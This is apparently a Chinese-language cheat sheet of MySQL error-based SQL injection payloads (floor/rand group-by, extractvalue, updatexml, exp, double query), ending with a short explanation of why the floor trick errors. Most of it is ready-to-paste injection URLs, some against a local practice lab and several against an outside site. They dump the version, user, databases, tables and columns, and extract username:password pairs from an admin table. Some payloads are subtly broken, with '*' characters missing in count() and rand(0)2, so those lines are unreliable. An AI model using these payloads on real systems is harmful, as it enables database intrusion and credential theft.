MySQL報錯注入方法整理
mysql暴錯注入方法整理,通過floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。
報錯注入:(and後不能直接跟select,可以加())
- 1.報錯注入floor---->(select 1 from (select count(*),concat((payload[]),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1
- 2.報錯注入extractvalue---->select extractvalue(1,concat(0x5c,([payload])))
- 3.報錯注入updatexml---->select 1=(updatexml(1,concat(0x3a,([payload])),1))
- 4.報錯注入Exp---->select Exp(~(select * from ([payload])a))
1、通過floor暴錯(原理在底部)
/資料庫版本/
http://127.0.0.1/2/Less-5/?id=1' and (select 1 from (select count(*),concat((select version()),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1 --+
/連線使用者/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
/連線資料庫/
http://127.0.0.1/2/Less-5/?id=1' and (select 1 from (select count(*),concat((select database()),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1 --+
/暴庫/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
/暴表/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
/暴欄位/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
/暴內容/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
2、ExtractValue(有長度限制,最長32位)
http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e, (select @@version),0x7e))
http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
3、UpdateXml(有長度限制,最長32位)
http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
4、NAME_CONST(適用於低版本)
5、Error based Double Query Injection
floor---->(select 1 from (select count(*),concat((payload[]),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1- Rand() //隨機函式
- Floor() //取整函式
- Count() //聚合函式
- Group by key //分組語句
當在一個聚合函式,比如count函式後面如果使用分組語句就會把查詢的一部分以錯誤的形式顯示出來。[這個是Mysql的bug]。
例項:
http://127.0.0.1/s/Less-5/?id=1′ and (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1# 0x3a :的十六進位制,在這裡把他作為分隔符,沒有它查出來的東西就連成一片。
group by key的原理是迴圈讀取資料的每一行,將結果保存於臨時表中。讀取每一行的key時,如果key存在於臨時表中,則不在臨時表中更新臨時表中的資料;如果該key不存在於臨時表中,則在臨時表中插入key所在行的資料。group by floor(random(0)*2)出錯的原因是key是個隨機數,檢測臨時表中key是否存在時計算了一下floor(random(0)*2)可能為0,如果此時臨時表只有key為1的行不存在key為0的行,那麼資料庫要將該條記錄插入臨時表,由於是隨機數,插時又要計算一下隨機值,此時 floor(random(0)*2)結果可能為1,就會導致插入時衝突而報錯。即檢測時和插入時兩次計算了隨機數的值不一致,導致插入時與原本已存在的產生衝突的錯誤。